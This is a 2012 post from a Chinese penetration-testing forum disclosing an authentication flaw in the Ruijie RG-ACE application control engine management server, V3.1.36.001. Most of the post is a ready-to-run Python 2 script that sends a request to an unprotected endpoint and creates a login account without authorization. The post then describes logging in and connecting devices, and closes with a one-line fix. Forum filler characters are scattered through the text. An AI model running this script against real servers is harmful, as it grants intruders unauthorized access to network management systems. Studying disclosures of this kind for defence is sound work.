找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2070|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
: I7 J' q9 i/ B: s0 R& D5 `* H" H; H- K3 x; N, r6 y' N. y

+ @- B6 e" I+ q, c, j# J测试的具体版本是
' J+ A! g) I# X; _6 r; Z( t产品名称: 锐捷应用控制引擎# n4 a* f3 H) O# j1 D2 ?
版本号: 3.1.36.001 TC! e# ?4 R  b; j! N4 x, k$ q+ ?
编译时间: 201104291730
+ e' e! r% S9 ]. q, K, K0 A
7 D8 e5 s5 i* k0 x# v7 J3 D6 y' F- v1 s4 |* z. y; d' I
漏洞证明:
% r9 f' L8 A4 {$ f) P4 }* O3 {  P
; O) J, C9 e, K6 o( e
% |/ H- L9 i$ b3 y( C5 G
6 z( A3 b5 x$ p% i7 v4 |5 p8 G+ G3 t9 u; O7 [. a

" F! u9 K2 b' \8 w$ n
& Q4 g1 O) ]" i' W执行脚本0 o# D' _3 u) q+ o6 A
#! /usr/bin/env python2 N  x. C% r; U" D; {
#coding=gbk3 W# ~  C* Q$ h9 `
#RG-ACE管理服务器 V3.1.36.001) @; K0 m6 g1 m$ l- r
import urllib2, urllib,cookielib1 Y# r5 h) A9 Z4 T+ C
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP, r- [% I, I4 L2 a* n
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
( V! f6 S! e5 [' ^! h- k$ _opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]( a* `; c5 b  e/ l) z8 R8 S
post=(("event","userManager.doInsertUserInfo"),3 ~1 c5 Y7 \* B/ n* @# v. n! u2 x
("useractionname","addButtonValue"),# V1 f0 {; A, T1 n- K; z! Q
("useropermanager","userManager"),$ L' j9 j, v1 m. j- Q
("userName","t"), #######账号自己加! |6 z; d* T8 x- V8 g6 O
("pwd","aaaaaa"),######密码自己加* @7 f2 X2 T1 Y: w
("trueName","ad"),
( Y( K+ X4 U& D("email",""),  k9 K  N# u! ?' ^5 F: B$ G
("mobilePhone",""),5 N) r4 {8 {, A* g+ {& }7 ~$ {
("officePhone",""),' Y' J  v3 I# b0 {) k9 E4 e
("addr",""),
7 ~  L6 d$ m& O/ Q& G("submit","确定"))
7 w9 k+ i/ U" M* x7 Hurllib2.install_opener(opener)" p9 k  n& R1 z5 Q% h
p=urllib2.urlopen(url, urllib.urlencode(post)).read()0 c5 e! m/ ^" {/ B
print "Done"
1 @* l8 Q1 w- r( j2 e  e" Z; {% ~% M0 d: W1 F  s7 v
登录,连接设备& _  K8 Z9 p9 F; m5 |; l4 C
8 R8 g0 N: o/ J! ?/ @; l( S! [" y2 r

+ c- A: M, {2 Y' {9 g3 t" x
. y' d8 E1 K% D' Z2 |- Z' a9 a
0 Y; {: I' d+ @+ K
6 ~3 @! E5 B0 C默认的管理员admin权限更大点4 {; k; Y, B. t$ L& x* }% ]1 y
; g- K/ P* m& S) ], l: O% Z

% Q& m$ }, e. |; ^, ~* n
) f2 y  ]6 v0 W # r/ r; S) ~3 C, y8 I; V, {$ h

8 E9 k% n7 S% w6 ?修复方案:! A7 A+ r0 w" j# U# @
加强对接口的权限验证* Z- Y* \- i2 M6 a0 L* d

( R' h% S. x1 F7 g
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表